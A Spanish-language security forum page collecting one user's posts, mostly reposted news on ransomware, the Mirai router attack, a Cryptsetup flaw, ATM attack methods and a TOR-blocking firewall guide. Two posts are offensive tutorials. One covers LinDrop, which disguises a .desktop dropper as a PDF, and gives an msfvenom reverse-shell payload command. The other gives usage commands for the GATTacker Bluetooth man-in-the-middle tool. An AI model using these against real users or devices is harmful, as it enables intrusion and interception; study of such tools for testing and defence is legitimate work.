Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - HATI

#81

Una de las características con las que llegó Windows 10 el pasado año es su nueva página de Configuración donde incorporó un montón de nuevos ajustes, que aumentaron con la llegada de Anniversary Update. Sin embargo, todavía hay otras muchas herramientas, configuraciones o ajustes en el antiguo Panel de Control, que hace que cada vez que los usuarios tiene que realizar alguna comprobación, echar mano de alguna utilidad o realizar algún ajuste en la configuración del sistema, ya no sepan muchas veces dónde tienen que ir.

Esto es algo que Microsoft parece estar planteándose, acabando con el Panel de Control para incorporar finalmente todas las opciones a la nueva página de Configuración de Windows 10, sin embargo, esto no se sabe cuándo podría llegar. Hasta entonces, hay algunas herramientas como la que vamos a mostrar a continuación, que pretenden hacer la vida un poco más fácil a los usuarios.



Muchos ajustes y herramientas de Windows desde un único panel

Nos referimos a nuePanel, un software gratuito que desde una única ventana, organizada en pestañas, ofrece más de 150 accesos directos a ajustes, herramientas o solucionadores de problemas de Windows 10 como el administrador de dispositivos, editor del registro, centro de acciones, visor de sucesos, monitor de recursos, diagnósticos, asistencia rápida, apagado remoto, etc. Herramientas o ajustes propios de Windows aunque también incluye algunos extras personalizados como el acceso al panel de configuración de nuestro router.


En definitiva, nuePanel permite tener a mano aquello que más necesidad podemos tener cada día de utilizar para no tener que andar navegando por la Configuración del sistema o el Panel de Control buscando aquello que necesitamos. La aplicación ofrece más de 150 accesos directos a ajustes, herramientas y otras utilidades, organizadas por pestañas. Por un lado, podemos encontrar aquellos ajustes o herramientas que nos puedes ayudar a resolver los problemas más comunes en Windows 10, en otra pestaña ofrece ajustes propios de Windows como opciones del menú inicio, la barra de tareas, tienda de Windows, activación del sistema, etc.

Pero además, también podemos encontrar una pestaña específica con los ajustes y herramientas de red, seguridad, privacidad, hadware, una especial de herramientas como la calculadora, cámara, navegadores de Microsoft, desfragmentación del disco, Photos, grabadora de vídeo, etc.


En la pestaña de aplicaciones también podemos encontrar accesos directos al explorador de archivos y aplicaciones, navegador Google Chrome, Mozilla Firefox, Internet Explorer, herramientas como el propio Excel, Outlook, PowerPoint o Word y una opción de búsqueda, para que si en un momento no encontramos lo que necesitamos lo podamos buscar fácilmente.




Funte: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#82

Hoy en día ya nada es inmune de ser atacado e infectado y más si los ciberdelincuentes están motivados. Esto ha quedado patente el viernes, cuando más de 2.000 sistemas informáticos de la agencia de transporte público de San Francisco fueron infectados por ransomware, según No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

La San Francisco's Municipal Transportation Agency (Agencia Municipal de Transporte de San Francisco), también conocida como MUNI, ofreció pasajes gratis durante el 26 de noviembre después de que los sistemas de pago de la estación y los monitores de los horario cayeran víctima de un ataque de ransomware.

Cabe destacar que los trenes no fueron afectados por el ataque del malware. Las pantallas y las máquinas de pago mostraban el siguiente mensaje:

Citar"You Hacked, ALL Data Encrypted. Contact For Key([email protected])ID:681, Enter."


Como se puede ver en el mensaje, los ciberdelincuentes daban una dirección de correo electrónico y un número de identificación para organizar los pagos del rescate.

"Hemos liberado la entrada como medida de precaución, para minimizar los daños del ciberataque", declaró el secretario de prensa de MUNI, Paul Rose.

Todavía no está claro quién fue el responsable del ataque (más allá de un seudónimo denominado "Andy Saolis"). Este es un pseudónimo comúnmente utilizado en los ataques No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, que utiliza herramientas comerciales para cifrar unidades de disco duro y recursos compartidos de red en máquinas Windows utilizando claves generadas al azar y sobrescribir los MBR de los discos duros para evitar que los sistemas se inicien correctamente.

La máquina de destino suele infectarse abriendo accidentalmente un archivo ejecutable malicioso en un correo electrónico o descargándolo y, a continuación, el malware se extiende a través de la red.

Según informes de la prensa local, los ordenadores fueron liberados cuando el MUNI pagó el rescate de unos 100 Bitcoins, aproximadamente unos 73.000 dólares.

Después de dos días de interrupción del servicio tickets, los quioscos de la estación de ferrocarril volvieron a conectarse el domingo. Si embargo, un día después, los delincuentes seguían amenazando con exponer 30 Gigabytes de datos de empleados y clientes robados durante el ataque, según informó Fortune a través de una serie de intercambios de correo electrónico con los presuntos atacantes.



Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#83


Los routers son los dispositivos de red más vulnerables ya que son dispositivos conectados directamente a Internet, sin ninguna capa de seguridad intermedia, especialmente en los entornos domésticos. Por ello, además de cambiar los credenciales de acceso, incluso desactivar el acceso remoto si no hacemos uso de él, es recomendable mantenerlos siempre actualizados con el último firmware para evitar que los piratas informáticos puedan comprometerlos aprovechando algún fallo del mismo, tal como ha ocurrido en Alemania.

Desde este fin de semana, casi un millón de routers domésticos pertenecientes a la compañía Deutsche Telekom, operador de Alemania con más de 20 millones de clientes, se han quedado sin servicio tras un ataque informático masivo que, según las primeras investigaciones, ha sido generado desde la botnet Mirai, botnet conocida por ser la responsable de bloquear medio Internet al atacar el mes pasado a Dyn.

Según parece, este ataque informático ha podido tener lugar porque los routers distribuidos por esta compañía, especialmente de la marca Speedport, tenían el puerto 7547 abierto y a la escucha de recibir comandos basados en los protocolos TR-069 y TR-064.

Aunque la investigación sigue en el aire, por el momento se sabe que los modelos que se han visto afectados son:

   
  • Speedport W 921V
  • Speedport W 723V Tipo B
  • Eir D1000

Estos routers no solo proporcionaban acceso a Internet, sino que también estaban siendo utilizados para ofrecer telefonía fija y televisión, servicios que también han dejado de funcionar tras el ataque.

Este ataque no ha estado centralizado en una región concreta de Alemania, sino que se ha distribuido uniformemente por todo el país.


Una actualización de emergencia parece solucionar el problema en Alemania, de momento.

Mientras se arroja más luz sobre el caso, las compañías cuyos clientes se han visto afectados por este ataque informático recomiendan que estos apaguen sus routers, esperen 30 segundos y los vuelvan a encender. De esta manera, se descargará un nuevo firmware de emergencia desarrollado, precisamente, para solucionar este problema y, una vez instalado, el router debería volver a funcionar con normalidad, libre de la vulnerabilidad que ha dado lugar a este ataque a gran escala.

Desde VirusTotal ya han registrado las dos variantes del malware Mirai que han sido utilizadas en estos ataques:


   
  • Mirai 24
  • Mirai 14

Sin embargo, dado que el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, urge actualizar y protegerse de estos ataques ya que otros piratas informáticos podrían comenzar una campaña similar, tanto en el propio país germano como en otros países en todo el mundo. De igual forma, los expertos temen que en los próximos días estos u otros piratas ataquen otros modelos diferentes de routers, pudiendo llegar a dejar sin servicio a un número mucho mayor de usuarios.

Mientras se solucionan todos los problemas causados por este ataque informático, Deutsche Telekom está ofreciendo a todos sus clientes Internet móvil gratis, una buena compensación que, al menos, no dejará tirados a los usuarios afectados.



Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#84

Windows 10 incluye por defecto una serie de herramientas que nos ayudan a solucionar los posibles problemas con los que nos encontremos mientras utilizamos el sistema operativo, sin embargo, estas no siempre son capaces de solucionarlos todos y, en ocasiones, nos toca buscar y descargar aplicaciones de terceros que nos ayuden a solucionar estos problemas. Para facilitar esta tarea hemos creado un paquete de aplicaciones bajo el nombre "Windows 10 FixTools" en el que incluimos todo lo necesario para dar solución a prácticamente cualquier problema mientras utilizamos el sistema operativo.

Windows 10 FixTools es un paquete de aplicaciones que hemos recopilado desde SoftZone de manera que, en vez de descargar todas las aplicaciones por separado, podamos descargarlas todas juntas para poder recurrir a ellas siempre que lo necesitemos. Además, estas aplicaciones son totalmente gratuitas y no necesitan instalación, lo que nos va a permitir también llevarlas siempre con nosotros en una memoria USB.




Herramientas recopiladas en nuestro pack Windows 10 FixTools

A continuación, vamos a ver las aplicaciones que hemos decidido recopilar en nuestro pack. Como hemos dicho, todas las aplicaciones son seguras, totalmente gratuitas y se pueden ejecutar de forma portable sin necesidad de instalarlas en el ordenador.

  • Windows Update FixIt Tool – Esta aplicación ha sido desarrollada por Microsoft para solucionar todos los problemas relacionados con Windows Update y permitirnos la correcta instalación de las actualizaciones cuando tengamos problemas al buscarlas, descargarlas o instalarlas.

  • O&O Shut Up 10 – Como la privacidad es uno de los aspectos que más han preocupado a los usuarios, esta herramienta nos permite activar y desactivar fácilmente todas las funciones del sistema operativo, funciones que, de normal, no podemos configurar ni desactivar.

  • FixWin – Esta aplicación nos permite arreglar varios errores aleatorios de Windows, de la tienda de aplicaciones y de Windows Update. Además, esta aplicación nos permite activar y desactivar determinadas características de Windows.

  • Ultimate Windows Tweaker 4 – Una herramienta bastante más avanzada que las dos anteriores que nos permite, además de solucionar determinados problemas, tener el control sobre distintos aspectos del sistema operativo, como el menú contextual o la apariencia completa de Windows 10.

  • Complete Internet Repair – Esta herramienta nos va a permitir solucionar prácticamente cualquier problema relacionado con Internet, desde problemas de conexión o DNS hasta problemas de configuración con alguna de las características básicas de Windows, como el cortafuegos o las conexiones VPN.




Como hemos dicho, las aplicaciones están descargadas desde sus correspondientes páginas web y subidas a nuestra cuenta personal de Mega. Todas ellas son totalmente gratuitas y se pueden ejecutar sin necesidad de instalarse en el ordenador, de forma portable.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#85

Hace unos días No tienes permitido ver los links. Registrarse o Entrar a mi cuenta corrió como la pólvora en redes sociales. En él se aconsejaba, paradójicamente, dejar de usar las redes sociales porque podrían afectar a tu trayectoria profesional, además de tener otras consecuencias negativas.

El caso es que a muchos se nos ha pasado por la cabeza alguna vez la idea de desconectar, de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, de no vivir tan pendientes de este universo digital. Para los que finalmente den el paso y tomen esa decisión, ahora una web te lo pone un poco más fácil.

La página web en cuestión se llama No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, y te permite eliminar tu presencia de Internet borrando las cuentas y perfiles de usuario que hayas creado para todo tipo de servicios online en unos pocos clics.

Es muy fácil de usar: sólo tienes que iniciar sesión con tu cuenta de Google, y en pocos segundos obtendrás un listado de cuentas en todo tipo de redes sociales y servicios online. Cada una de ellas tiene varios enlaces a su lado, que puedes usar para borrarte del servicio correspondiente, o para marcarlo como que lo quieres conservar. La eliminación de las cuentas en sí no se hace directamente en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, sino en la propia web de cada servicio.

De hecho, la web es útil no sólo para eliminar perfiles de usuario rápidamente, sino también para dar un repaso a todas esas cuentas que no recuerdas haber creado y que no has vuelto a usar nunca más desde el día que la diste de alta.


Deseat.me recuerda a otros servicios de "limpieza automatizada" similares que te ayudan a librarte de los peores elementos de Internet, como la publicidad o el spam. Un ejemplo de éstos es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, una herramienta para desuscribirse masivamente de newsletters que ya no te interesan.

En cualquier caso, se trata de una utilidad interesante para repasar todas las cuentas de usuario que has creado, y cerrar definitivamente aquellas que no te interese mantener.



Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#86
LinDrop es un vector de ingeniería social dedicado a objetivos con sistema operativo Linux. Se trata de un script en python que genera ZIP  con un  archivo .desktop malicioso que imita ser un PDF.
Este metodo no es algo nuevo, pero Lindrop destaca por centrar sus objetivos a sistemas Linux, permitiendo enviar archivos zip o tar.gz vía email.




Camuflar archivos .desktop de forma manual:

El método para crear archivos .desktop es bastante antiguo. Guardamos un archivo, escribiendo espacios entre la extensión .pdf y la .desktop. Esto es para ofuscar la extensión actual cuando el archivo se abre con Archive Manager.

Después, editamos nuestro archivo añadiendo algunas líneas para que se parezca más a un archivo pdf:

Edición del fichero Underc0de.pdf.desktop

Para el icóno necesitamos una imágen que esté guardada en el objetivo, ya que si no el archivo se mostraría cómo un ejecutable. Para conseguir esto, añadimos la ruta en la que se encuentra la imágen que gnome asocia a los archivos pdf.

Fichero Underc0de.pdf.desktop editado

De esta manera conseguimos obtener el archivo .desktop camuflado de forma manual y un poco rudimentaria, ahora veremos cómo se hace con LinDrop de manera más avanzada en cuatro sencillos pasos.





Uso de LinDrop:

Uso de Lindrop.

  • 1: introducir el nombre para el archivo "PDF" (.desktop) que estará en el archivo ZIP.
  • 2: introducir el nombre para el archivo ZIP.
  • 3: introducir url para descarga remota del payload. Este se guardará en el directorio /tmp. Para ello podemos utilizar msfvenom:
Citarmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload
  • 4: introducir PDF para mostrar al usuario.

Al acabar obtendremos el archivo zip con el supuesto pdf dentro listo para enviar. Cuando la víctima lo abra, se le mostrará, en este caso, el taller de pentesting de Underc0de para no levantar sospechas, mientras que el payload esta siendo ejecutado y obtendremos nuestra sesión de meterpreter.

Resultado en el equipo víctima del ataque.




El código del script aún es algo sucio, pero tenemos la oportunidad de mejorarlo notablemente y añadirle nuevas características. Si alguno se anima, tiene repositorio en GitHub:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Un saludo, HATI  ;D
#87


Todavía no ha pasado un año desde que informamos de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que permitía saltarse esta contraseña al presionar 28 veces exactas la tecla de retroceso. Al hacerlo, se iniciaba un "Grub Rescue Shell" desde el que se podía acceder al equipo sin usar ninguna clave. Un bug descubierto por Ismael Ripoll y Héctor Marco que, precisamente, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

En esta ocasión, se trata de un fallo que permite tener acceso root en Linux con solo pulsar Intro durante 70 segundos de manera continuada y que afecta a casi todas las distribuciones Linux populares: Ubuntu, Fedora, Debian, Red Hat Enterprise Linux (RHEL), y SUSE Linux Enterprise Server (SLES) -los usuarios de Arch Linux, y Solus no se están viendo afectados.


¿En qué consiste?

Tal y como explican los citados investigadores en su blog, se trata de un problema de seguridad que tiene que ver con una vulnerabilidad No tienes permitido ver los links. Registrarse o Entrar a mi cuenta en la implementación de la utilidad Cryptsetup, que se usa para cifrar discos duros a través de Linux Unified Key Setup (LUKS), que es el sistema de cifrado estándar en un sistema operativo Linux.

El fallo radica en la forma en la que Cryptsetup maneja las contraseñas erróneas para el proceso de descifrado cuando el sistema arranca. En este caso, permite al usuario probar contraseñas múltiples veces. De hecho, aunque utilice los 93 intentos disponibles para introducirla, llega a una consola con privilegios root. Lo consigue dejándola en blanco y manteniendo pulsada la tecla de enter durante 70 segundos; momento a partir del cual tendrá acceso root a una consola initramfs (initial RAM file system).


La vulnerabilidad, por otra parte, se puede aprovechar de manera remota y brinda al atacante la opción de acceder y eliminar la información de todos nuestros discos, cifrados o no, mediante un ataque de fuerza bruta.

Esta vulnerabilidad permite una escalada de privilegios. O sea, puede usarse para almacenar un archivo ejecutable con SetUID bit activado. Posteriormente, un usuario local tendría la opción de ejecutarlo para escalar sus privilegios. Si el arranque no está protegido, sería posible también que un atacante reemplazase el kernel y la imagen initrd.


¿Cuál es la solución?


Solucionarlo, por fortuna y según apunta los investigadores, resulta relativamente sencillo. En primer lugar, pulsa la tecla de intro durante 70 segundos para comprobar si tu sistema es vulnerable. En caso de que así sea, consulta con tu proveedor de asistencia técnica para comprobar si existe un parche.

Y si este no se encuentra disponible, puedes detener el arranque cuando se alcance el límite de intentos que fijes con este comando:

Código: text
    sed -i 's/GRUBCMDLINELINUXDEFAULT="/GRUBCMDLINELINUXDEFAULT="panic=5 /' /etc/default/grub grub-install





Fuente:www.genbeta.com
#88




¿De que va todo esto?

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta incorpora emparejamiento de dispositivos y encriptación de capa de enlace. Sin embargo, una cantidad significativa de dispositivos no implementa estas características. O no proporcionan seguridad de transmisión en absoluto, o aseguran por medios propios en capas de aplicación. Los vendedores prometen "cifrado de grado militar de 128 bits" y "nivel de seguridad sin precedentes", no dispuestos a compartir detalles técnicos. Hemos visto tales declaraciones antes, y muchas veces no resistieron a una evaluación profesional independiente y resultó ser "*snake oil". Ya es hora de verificar estas afirmaciones, ahora es posible con la ayuda de nuestra nueva herramienta de código abierto.

(*Snake oil: se refiere al producto de criptografía o seguridad que hace un exagerado anuncio de lo que es capaz de hacer, dando al usuario un falso sentido de la seguridad. Glosario: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)

Compartimos varias vulnerabilidades ya identificadas cómo ejemplo. Esperamos que la comunidad aumente su número, ayudando a desarrollar las nuevas características de la herramienta, cooperando con los vendedores, y mejorando la seguridad para los usuarios finales.




Ataques posibles:

Los dispositivos pueden ser atacados de varias maneras: desde la simple denegación de servicio, pasando por el spoofing, la interceptación de transmisión pasiva y activa, hasta el abuso de los servicios del dispositivo mal configurado. Los ataques pueden ser entre otros:
  • Deegación de servicio
  • Spoofing (falsas indicaciones, desactivar alarmas)
  • Interceptación de datos (información personal, autenticación, etc.)
  • Tomar el control sobre el dispositivo (abrir el bloqueo inteligente, modificar caracteristicas del hogar inteligente)


Puedes encontrar ejemplos de vulnerabilidades identificadas en el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.




Dispositivos vulnerables:

El ataque es más eficaz contra los dispositivos que no implementan las funciones de seguridad Bluetooth (emparejamiento). Hemos examinado un puñado de dispositivos, incluyendo:

  • Relojes inteligentes
  • Token de autenticación
  • Punto de venta inteligente
  • Cerraduras inteligentes
  • Soluciones anti robo
  • Automatización del hogar
  • Buscadores inteligentes
  • Sensores
  • Balizas
  • Varios gadgets.

Alrededor de 2 de 10 (sobre todo los relojes inteligentes) no utilizan las funciones de seguridad Bluetooth correctamente.




Hardware necesario para el ataque:

La funcionalidad de nuestra herramienta se probó en Raspberry Pi y otros sistemas Linux con adaptadores Bluetooth 4. Algunos de los ataques pueden realizarse utilizando un smartphone u otros dispositivos embebidos. Es técnicamente posible implementar el dispositivo atacante en un minúsculo módulo de tamaño baliza (unos pocos cm cuadrados), accionado por batería.




Funcionamiento de la herramienta:

La herramienta crea una copia exacta del dispositivo atacado en la capa Bluetooth, a continuación engaña a la aplicación móvil para interpretar sus emisiones y conectarse a ella en lugar de al dispositivo original. Al mismo tiempo, mantiene la conexión activa al dispositivo, y le envía los datos intercambiados con la aplicación móvil. De esta manera, actuando como "Man-in-the-Middle", es posible interceptar y / o modificar las peticiones y respuestas transmitidas.




¿Por qué la aplicación se conecta al dispositivo "clonado" en lugar del original?

La mayoría de las aplicaciones móviles inician la conexión al dispositivo buscando paquetes publicitarios emitidos por el dispositivo. Por lo general, los dispositivos optimizan los intervalos de publicidad con el fin de minimizar el consumo de energía. El atacante sin embargo puede difundir los anuncios pertinentes con intervalos mínimos (mucho más rápido). La aplicación móvil interpretará la primera publicidad recibida, y en este caso probablemente será la falsa.




¿Funciona contra conexiones cifradas?

Actualmente, la herramienta funciona para dispositivos que no implementan el cifrado de la capa de enlace Bluetooth LE. Sin embargo, hay sorprendentemente muchos de estos dispositivos.




Componentes de la herramienta

  • El módulo central (ws-slave.js) escucha anuncios, escanea los servicios del dispositivo para clonar en "periféricos" y reenvía los mensajes de lectura/escritura/notificación intercambiados durante el ataque activo.

  • El módulo "periférico" (advertise.js) carga la especificación de dispositivo (anuncio, servicios, características, descriptores) recogida por el módulo "central" y actúa como el dispositivo "emulador".

  • Las funciones de gancho opcionales permiten manipular solicitudes y respuestas.

  • Escáner de ayuda scout.js escanea para los dispositivos y crea los archivos de JSON con los anuncios y los servicios + características del dispositivo.

  • Además, se adjunta un script de interfaz BlueRadios AT en standalone / blueRadiosCmd.js.




Prerrequisitos:





Instalación:

Código: text
npm install gattacker





Configuración:

Ejecutar ambos componentes y configurar variables en config.env:

  • NOBLE_HCI_DEVICE_ID: dispositivo noble ( "central", ws-slave)
  • BLENO_HCI_DEVICE_ID: dispositivo bleno ( "periférico", anunciar)

Si ejecutas los módulos "centrales" y "periféricos" en cajas separadas con una sola interfaz BT4, puedes dejar los valores comentados.

  • WS_SLAVE: Dirección IP de la caja ws-slave
  • DEVICES_PATH: ruta para almacenar archivos json




Iniciar dispositivo "central"

Código: text
Sudo node ws-slave


Se conecta al periférico de destino y actúa como servidor websocket.

Depurar:

Código: text
DEBUG = ws-slave nodo sudo ws-slave





Escáner:

Escaneo de anuncios

Código: text
node scan


Sin parámetros escanea para difundir anuncios y los registra como archivos json (.adv.json) en DEVICES_PATH.

Explorar servicios y características:

Código: text
node scan <peripheral>


Explora los servicios y las características de los periféricos elegidos. Guarda la estructura de servicio del explorador en el archivo json (.srv.json) en DEVICES_PATH.




Clonación de direcciones MAC:

Para muchas aplicaciones es necesario clonar la dirección MAC del dispositivo original. Una herramienta de ayuda bdaddr de Bluez se proporciona en helpers/bdaddr.

Código: text
cd helpers/bdaddr
make


wrapper script:

Código: text
./mac_adv -a <advertisement_json_file> [ -s <services_json_file> ]





Reiniciar dispositivo:

Código: text
hciconfig <hci_interface> reset





Infografía:




DOCUMENTACIÓN:


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta






Un saludo, HATI  ;D




#89


Método 1: un centro falso de procesamiento

Este método puede usarse si un atacante es capaz de acceder al cable que conecta el cajero con la red. Un hacker desconecta el cajero de la red del banco y luego lo conecta a un aparato que actúa como un centro falso de procesamiento.

La caja se utiliza para controlar la retirada de efectivo y envía comandos al cajero en los que se pide que se retire dinero de la bandeja seleccionada. ¡Voila! El atacante puede usar cualquier tarjeta o introducir cualquier código PIN, la transacción falsa parecería legítima. Video 1.







Método 2: un ataque remoto en varios cajeros automáticos

En este método se necesita a un infiltrado que trabaje en el banco. El delincuente obtiene (adquiere) de forma remota una clave utilizada para abrir el bastidor del cajero. Aunque esta clave no permita al atacante acceder a la retirada de dinero, el cable de red quedaría al descubierto. El hacker desconecta el cajero de la red del banco y conecta un aparato especial que envía todos los datos a su propio servidor.

A menudo, la red que se conecta al cajero no está segmentada y los propios cajeros pueden estar mal configurados. En este caso, con dicho dispositivo, un hacker podría comprometer varios cajeros a la vez, aunque el dispositivo malicioso solo esté conectado a uno de ellos.

El resto del ataque se lleva a cabo como hemos explicado antes. Se instala un centro falso de procesamiento en el servidor y el atacante obtiene el control total sobre el cajero. Utilizando cualquier tarjeta, el culpable puede retirar dinero del cajero, sin importar el modelo. Lo único que tienen que tener en común todos los cajeros para poder acceder a ellos es el protocolo utilizado para conectarlos al centro de procesamiento. Video 2.







Método 3: el ataque de la caja negra

Como en el método anteriormente descrito, el atacante obtiene la clave del bastidor del cajero y pone la máquina en modo de mantenimiento. Entonces, el hacker conecta la llamada caja negra al puerto USB expuesto. Una caja negra es un dispositivo que permite al hacker controlar el cajón del dinero.

Mientras el agresor altera el cajero, la pantalla muestra un mensaje como "en mantenimiento" o "afuera de servicio", aunque en realidad, es posible sacar dinero de este. Además, la caja negra puede ser controlada de forma inalámbrica vía smartphone. Un hacker solamente tiene que pulsar un botón en la pantalla para conseguir dinero en metálico y deshacerse de la caja negra para esconder las pruebas. Video 3.







Método 4: un ataque malware

Hay dos formas de infectar un cajero con malware: insertando un dispositivo USB con malware (eso conlleva tener la clave para abrir el bastidor del cajero) o infectando la máquina de forma remota, todo esto tras haber comprometido la red del banco.
Si el cajero no está protegido contra el malware y no emplea listas blancas, un hacker puede hacer que el malware envíe comandos al cajero y que este expenda dinero. El ataque podría repetirse hasta que el dinero del cajero se agote. Video 4.







Afortunadamente, no todos los cajeros son hackeables. Los ataques descritos anteriormente son factibles solo si algo no está bien configurado. Podría ser el caso de, por ejemplo, una red de banco no segmentada o de un cajero que no requiera una autenticación cuando el software intercambia datos con el hardware, o no haya listas blancas para las apps, o el cable de red esté al alcance del atacante.

Desafortunadamente, este tipo de problemas son muy comunes. Por ejemplo, permiten a un hacker infectar una serie de cajeros con el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Los expertos de Kaspersky Lab están siempre disponibles para ayudar a los bancos a solucionar este tipo de problemas: podemos ofrecer servicios de consultoría o estudiar la infraestructura del banco, analizando su resistencia a los ataques.




Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#90
Sin duda las redes TOR han adquirido un protagonismo considerable en estos últimos años. Ya debemos saber que no siempre TOR, se usa para realizar actos delictivos sino también para evadir censuras en países autoritarios y dónde la democracia y libertad de expresión es un lujo escaso.

No obstante, nosotros siempre nos centramos en las posibilidades que puedan dar las redes TOR, tanto ofensivamente como defensivamente.

Hoy toca ser defensivos, y vamos a ver como poder parar de forma simple, visitas desde redes TOR a un servicio apache nuestro, publicado en Internet. Las reglas pararán cualquier intento de conexión pero utilizaremos apache como sonda de prueba.

La idea me surgió hace tiempo pero hoy he podido plasmarla en el artículo. Y es que entrando en pequeños debates de como mejorar servicios de Firewalls conocidos, con un gran profesional al que aprovecho y le mando saludos, me propuse hacer algo básico para trasladar mi idea y/o ponerla en práctica.

Empecemos pues.

La idea: No permitir accesos desde redes TOR a nuestro servidor y de paso, bloquear IPs que hayan sido reportadas o estén listadas en repositorios dedicados a recopilar esto.

¿Qué vamos a usar?


       
  • IPTables
  • IPSet
  • Feeds de IPs/Maliciosas y TOR
  • Script base de trick77(Github: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)





Lo primero que haremos será instalarnos IPSet. IPSet es un "añadido" del kernel de Linux. Permite configurar diferentes IPs, MACs, puertos, etc... para cargarlas desde IPTables. El por qué de usarlo es porque permite cargar miles de direcciones IP y solamente cargarla con una línea de IPTables. Sino usáramos esto, tendría que ser el proceso a "manopla" y es inviable a no ser que tengáis mucho tiempo u os montéis un script, que es lo que hacemos nosotros.

El proceso es el de siempre para instalar en Debian/Kali:
Código: text
apt-get install ipset


Una vez hecho esto, procederemos a la descarga de un script que funciona a las mil maravillas, además de completo, de trick77. Con este programita solucionaremos gran parte del "problema" por lo que seguiremos parte del README aunque haremos algunas aclaraciones para que sea todo 100% operativo así como alguna modificación del código inicial.

Código: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Guardamos en una ruta "popular" de nuestro equipo o VM aunque lo ideal para ponerlo en producción es meterlo en la ruta /usr/local/sbin/.Es un script de Shell de Bash por lo que la extesión será .sh.

Una vez decidido dónde queremos tener alojado nuestro script vamos a otorgarle permisos de ejecución con:
Código: text
chmod +x /ruta/torblock/script.sh


Creamos una carpeta nueva dónde alojaremos la carpeta principal de IPSet:
Código: text
mkdir -p /etc/ipset-blacklist


A continuación procedemos a descargar el fichero de configuración que contiene las premisas en las que se basarán nuestros bloqueos.

Podemos descargarlo de: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y lo situaremos en /etc/ipset-blacklist/

Decir que el fichero de configuración ipset-blacklist.conf contendrá feeds de diferentes tipos de IPs (maliciosas, TOR, spam, etc...)



Estas líneas pueden comentarse para que no realicen la descarga del listado de IPs que queramos excluir. Personalmente, creo que no está de más tener toda la lista en funcionamiento para bloquear la mayoría de IPs que su origen sea dudoso. Nosotros vamos a dejarlo como está, aunque si queréis cambiar o añadir otros servicios, también es válido.

Hecho esto, procederemos a ejecutar el script para que empiece a descargar listados de IPs y trasladarlos a nuestro fichero ipset-blacklist.restore

Usaremos:
Código: text
./torblock.sh /etc/ipset-blacklist/ipset-blacklist.conf




En la anterior captura se aprecia la ejecución del script que, como decimos, descarga listados de IPs tanto TOR, maliciosas, de SPAM, etcétera... También se ocupa automáticamente de crear el contenedor IPSet, que es un almacenamiento que albergará dichas IPs. Básicamente emplea un comando para crear este contenedor parecido a:
Código: text
ipset create blacklist hash:net hashsize 4096


También el script si analizáis el código, añade automáticamente esto:
Código: text
iptables -I INPUT 1 -m set –match-set blacklist src -j DROP


Qué es la regla IPTables que llama al contenedor "blacklist" y hace un bloqueo total del contenedor, el cual, como venimos diciendo, contiene las miles de IPs maliciosas.



En esta captura se aprecia una pequeña muestra de la cabecera del fichero que contiene las IPs que hemos descargado de los repositorios.

Hemos llamado el script de trick77 como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para que sea más identificativo a la hora de identificarlo y/o configurarlo de forma automática. No obstante hemos modificado algunas premisas para adaptarse mejor a los aplicativos en dónde tenemos esto testeando. La siguiente ruta que aparece junto a la llamada del script, es indicarle la configuración que tomará el script para su ejecución.

Importante: Una de las modificaciones que hemos hecho en el código es añadir una simple línea llamada:
   
Código: text
ipset restore < /etc/ipset-blacklist/ip-blacklist.restore


¿Por qué?¿Qué hace esto?

Por la sencilla razón de que si lo integramos, al cronearlo, automáticamente también se actualiza el "contenedor" IPSet. Lo que hace esta línea de código es coger del fichero .restore las nuevas IPs y refrescar la lista.

¿Y si quiero anular el efecto de bloqueo?

iptables –D INPUT X donde X es el número del listado de las reglas que tengas. Nosotros en el servidor de pruebas tenemos 1, pues sería 1 solo. Otros servidores pueden tener cientos.


Recopilemos:

Tenemos un script llamado No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que nos actualiza las IPs maliciosas (TOR, Spam, etc...) nos genera el contenedor IPSet donde irán dichas IPs y generará una regla IPTables para bloquear.


Mejoras:


  • Meter el script de actualización en /etc/rc.local para asegurar su ejecución al inicio del sistema.
  • Crontab: Meterle una línea al Cron para que cada X tiempo se ejecute y tenga actualizadas las listas de IPs


Directorio de pruebas:




Visitando el sitio con Firefox con IP Pública:




Visitando el sitio con TorBrowser:




Con esto ya no hay excusa para impedir accesos a nuestros servidores o sitios publicados en Internet. Si no necesitamos/interesa visitas desde redes de anonimato ¿por qué permitirle el acceso?

Estamos, de paso, realizando uno de los pasos importantes a la hora de securizar cualquier dispositivo/servidor, que es reducir la superficie de exposición de ataques.

Espero que os haya gustado y sobre todo, espero que podáis utilizar este artículo para consultas si os interesa tener algo así.



Autor:ManoloGaritmo
Fuente:hacking-etico.com
#91
